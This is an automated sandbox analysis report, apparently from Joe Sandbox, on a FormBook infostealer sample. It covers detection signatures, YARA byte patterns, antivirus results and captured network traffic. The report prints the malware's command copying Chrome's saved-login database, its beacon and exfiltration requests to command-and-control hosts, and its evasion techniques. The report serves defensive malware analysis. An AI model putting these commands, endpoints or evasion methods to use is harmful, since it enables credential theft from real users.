Play interactive tourEdit tour

# Analysis Report xg28sL5JDm.exe

## Overview

### General Information

 Sample Name: xg28sL5JDm.exe MD5: 427c74cd09c5e3da8c9c9f3d5c1c126a SHA1: 59583b1abf57a9d1d01de013d864ec3c75d68938 SHA256: e082a8136dd0aa48cfefb68b6afb0878004c250f50900efddba892fc23c68500 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Domain name seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x15749:\$sqlite3step: 68 34 1C 7B E1
• 0x1585c:\$sqlite3step: 68 34 1C 7B E1
• 0x15778:\$sqlite3text: 68 38 2A 90 C5
• 0x1589d:\$sqlite3text: 68 38 2A 90 C5
• 0x1578b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x158b3:\$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x7248:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x74b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x12ae5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x125d1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x12be7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x12d5f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x802a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1184c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x89c3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x17e37:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x18e3a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x15749:\$sqlite3step: 68 34 1C 7B E1
• 0x1585c:\$sqlite3step: 68 34 1C 7B E1
• 0x15778:\$sqlite3text: 68 38 2A 90 C5
• 0x1589d:\$sqlite3text: 68 38 2A 90 C5
• 0x1578b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x158b3:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 43 entries
SourceRuleDescriptionAuthorStrings
3.2.xg28sL5JDm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
3.2.xg28sL5JDm.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x14949:\$sqlite3step: 68 34 1C 7B E1
• 0x14a5c:\$sqlite3step: 68 34 1C 7B E1
• 0x14978:\$sqlite3text: 68 38 2A 90 C5
• 0x14a9d:\$sqlite3text: 68 38 2A 90 C5
• 0x1498b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x14ab3:\$sqlite3blob: 68 53 D8 7F 8C
3.2.xg28sL5JDm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x6448:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x66b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x11ce5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x117d1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x11de7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x11f5f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x722a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x10a4c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x7bc3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x17037:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1803a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.1.sdv88p2lg.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
15.1.sdv88p2lg.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x15749:\$sqlite3step: 68 34 1C 7B E1
• 0x1585c:\$sqlite3step: 68 34 1C 7B E1
• 0x15778:\$sqlite3text: 68 38 2A 90 C5
• 0x1589d:\$sqlite3text: 68 38 2A 90 C5
• 0x1578b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x158b3:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 43 entries

## Sigma Overview

### System Summary:

 Source: Process started Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5972, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3252
 Sigma detected: Suspicious Svchost Process Show sources
 Source: Process started Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972
 Sigma detected: Windows Processes Suspicious Parent Directory Show sources
 Source: Process started Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972

## Signature Overview

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: xg28sL5JDm.exe Avira: detected
 Antivirus detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe Avira: detection malicious, Label: HEUR/AGEN.1046743
 Multi AV Scanner detection for domain / URL Show sources
 Source: www.allixanes.com Virustotal: Detection: 6% Perma Link Source: http://www.allixanes.com/ez3/ Virustotal: Detection: 11% Perma Link Source: http://www.allixanes.com Virustotal: Detection: 6% Perma Link Source: http://www.tylermercer.net/ez3/ Virustotal: Detection: 7% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe Virustotal: Detection: 81% Perma Link Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe Metadefender: Detection: 28% Perma Link Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe ReversingLabs: Detection: 90%
 Multi AV Scanner detection for submitted file Show sources
 Source: xg28sL5JDm.exe Virustotal: Detection: 81% Perma Link Source: xg28sL5JDm.exe Metadefender: Detection: 28% Perma Link Source: xg28sL5JDm.exe ReversingLabs: Detection: 90%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 15.1.sdv88p2lg.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 3.2.xg28sL5JDm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 3.1.xg28sL5JDm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 15.2.sdv88p2lg.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 14.2.sdv88p2lg.exe.2270000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 5.2.svchost.exe.2d00000.2.unpack Avira: Label: TR/Patched.Ren.Gen Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 14.2.sdv88p2lg.exe.2600000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_004051BC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004051BC

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov ebx, 000014B9h 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then push 00000000h 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov eax, dword ptr [00475BF0h] 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov dl, byte ptr [eax+0046BF64h] 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then inc ebx 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov eax, dword ptr [esp] 0_2_00469C6C Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then pop edi 3_2_0040BB4B Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop edi 5_2_0040BB4B Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then mov eax, dword ptr [esi+34h] 14_2_022B4705 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then jmp 022B5F22h 14_2_022B5766 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then add edx, 02h 14_2_022B7243 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then mov dword ptr [ebp+10h], ebx 14_2_022B3ED1 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then call dword ptr [edi+000000F4h] 14_2_022B282D Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 18_2_007ABB4B

### Networking:

 Tries to resolve many domain names, but no domain seems valid Show sources
 Source: unknown DNS traffic detected: query: www.tinbaofb.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.tatilultra.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.tqg6k4jl-0k8rlg.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.greenslandscapingllc.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.estereojerusalenfm.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.zqhanu.men replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.chestermerecalgaryhomes.info replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.oraning.net replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.hoops2life.net replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.vxstfh.men replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.jwc.bet replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.djhong.net replaycode: Name error (3)
 Domain name seen in connection with other malware Show sources
 Source: Joe Sandbox View Domain Name: www.allixanes.com www.allixanes.com
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1Host: www.tylermercer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 198.185.159.144 198.185.159.144 Source: Joe Sandbox View IP Address: 198.185.159.144 198.185.159.144
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.tylermercer.netConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.tylermercer.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tylermercer.net/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 7a 67 49 71 67 45 4f 44 70 63 53 76 64 57 64 32 61 6e 6b 58 59 48 66 47 62 2d 6b 7a 53 59 46 34 42 6f 64 6b 36 69 56 47 68 4d 45 48 72 6e 4d 6f 34 77 36 4e 58 68 43 52 43 70 7a 41 64 44 37 30 59 6c 4a 36 30 32 30 32 51 55 38 5a 38 35 69 51 32 68 36 77 5a 6f 52 71 30 34 70 31 57 50 44 58 79 53 51 49 41 4b 53 7a 65 43 35 57 7a 6b 66 78 72 72 4c 48 64 31 65 35 44 68 6b 5f 35 58 55 47 28 4d 57 65 63 50 53 47 4b 43 64 49 57 6b 6a 66 6c 4b 54 48 4b 30 37 4e 34 42 49 6b 55 54 66 75 6a 43 6c 72 42 50 4e 67 66 73 77 6c 4c 57 4c 2d 62 30 6d 6a 55 47 66 64 50 59 41 41 51 45 35 48 67 32 46 63 78 77 28 54 61 6b 44 75 6f 65 6b 48 64 31 35 63 55 4e 47 79 53 4e 62 5f 46 5a 55 66 6b 6c 73 31 61 2d 51 6a 58 41 63 31 48 78 56 33 55 6c 49 48 70 38 49 74 6c 47 76 44 77 33 75 5a 44 4b 69 56 56 58 46 71 4e 6d 6c 38 6b 67 6e 77 77 4d 69 76 4f 53 34 4a 6a 56 4c 63 45 57 72 39 72 62 4e 41 47 5a 79 77 76 5a 49 63 76 65 42 31 59 58 50 74 43 51 43 71 43 73 65 52 37 58 6a 61 34 58 70 44 56 68 39 51 37 56 76 42 6c 38 79 73 31 70 47 55 32 70 38 34 7e 57 72 41 70 64 51 6b 6b 64 41 69 76 65 4e 5a 30 30 41 6c 4b 7a 77 37 5a 6a 45 53 52 79 31 5a 37 31 63 69 79 51 4c 4e 58 78 45 75 56 5a 6e 58 61 45 74 38 51 39 35 33 73 45 74 37 4f 48 32 4d 53 4a 44 34 4b 68 56 33 6d 66 37 35 68 78 48 56 48 6a 61 38 62 49 6e 56 39 4f 54 72 6d 72 71 75 47 6f 41 33 4a 46 38 2d 50 6b 76 67 75 6e 33 77 55 79 6b 67 78 36 63 69 63 6f 67 31 52 44 4d 30 49 4c 55 7a 36 64 4e 7a 58 4c 38 4f 6a 70 74 4c 72 48 4a 32 49 58 6c 46 46 63 74 35 6e 6d 4f 64 31 67 65 46 69 4e 41 36 63 61 62 76 63 66 69 2d 42 2d 66 41 4a 68 4d 68 6c 32 6b 58 35 53 41 78 6a 5f 77 38 41 63 55 36 62 46 73 74 74 47 30 42 37 50 79 7a 71 33 70 47 36 4d 44 35 74 46 72 45 67 65 72 51 47 58 31 49 33 32 6b 41 51 49 67 6f 36 76 66 6e 42 4a 4e 46 59 78 58 44 74 34 6f 48 34 78 38 38 75 5f 48 71 43 6f 4e 79 28 76 30 6a 57 7a 74 45 47 7a 6a 35 74 6d 47 65 76 59 63 5a 4c 69 39 37 59 76 6d 38 4c 6a 35 74 73 5f 54 47 44 56 76 52 68 54 57 58 7a 63 77 68 30 57 52 6a 4e 31 4a 4f 38 5a 6a 52 28 70 53 63 6b 5f 49 5a 78 35 73 41 34 76 33 4a 36 51 56 44 35 65 65 54 63 64 64 42 59 55 6f 37 73 39 70 68 78 46 4e 55 47 33 46 34 63 48 68 54 6e 6b 48 6c 49 5f 66 69 6b 72 70 4f 36 47 52 7a 74 61 7a 35 28 7a 73 63 41 7a 61 65 31 47 4c 4b 63 43 73 6d 41 66 57 33 48 5f 51 48 74 37 64 4c 50 47 32 58 4b 52 74 55 4a 5a 39 47 6c 58 35 57 6c 54 5a 32 4c 41 46 42 47 56 47 48 69 38 45 6d 49 75 46 2d 66 70 61 4f 51 2d 4f 36 4c 55 61 6a 52 51 54 48 7e 48 57 68 4a 37 6e 43 4e 56 37 4a 61 63 51 39 42 6c 7a 53 6e 6e 4c 6f 49 31 78 5f 45 4a 6f 68 43 44 61 32 4b 53 78 5 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 66 56 69 4e 52 56 4f 73 32 59 42 32 6e 50 67 2d 72 4c 49 4d 70 4f 62 74 70 6a 6c 61 47 33 57 4e 30 45 42 70 50 52 4d 63 72 77 75 75 4b 70 48 33 7a 31 6b 30 43 45 36 76 66 55 75 4b 34 38 46 78 72 6f 53 72 49 44 70 53 77 6f 58 71 36 5f 6b 5a 69 69 73 44 4e 64 61 41 62 36 66 64 28 4d 4a 50 4a 55 70 57 64 2d 4e 54 54 41 4e 2d 30 64 38 69 6f 55 41 75 32 4e 77 58 57 34 47 67 7a 44 56 41 4a 49 57 49 6a 64 77 39 77 62 49 79 34 66 48 76 77 2d 28 41 41 77 79 75 73 33 54 69 37 35 65 46 58 5f 71 59 52 47 47 4f 55 73 6e 45 7a 62 30 53 38 62 69 52 31 4b 6b 2d 44 53 38 39 4a 49 6a 65 28 64 51 38 33 6d 70 50 49 37 58 70 68 63 54 38 64 69 33 64 4f 56 4f 38 44 56 57 46 6e 49 6a 33 57 63 71 46 72 33 36 47 32 58 64 72 4c 68 79 53 38 68 47 77 49 50 45 53 36 58 37 36 30 4c 52 48 6e 48 63 67 68 70 73 52 43 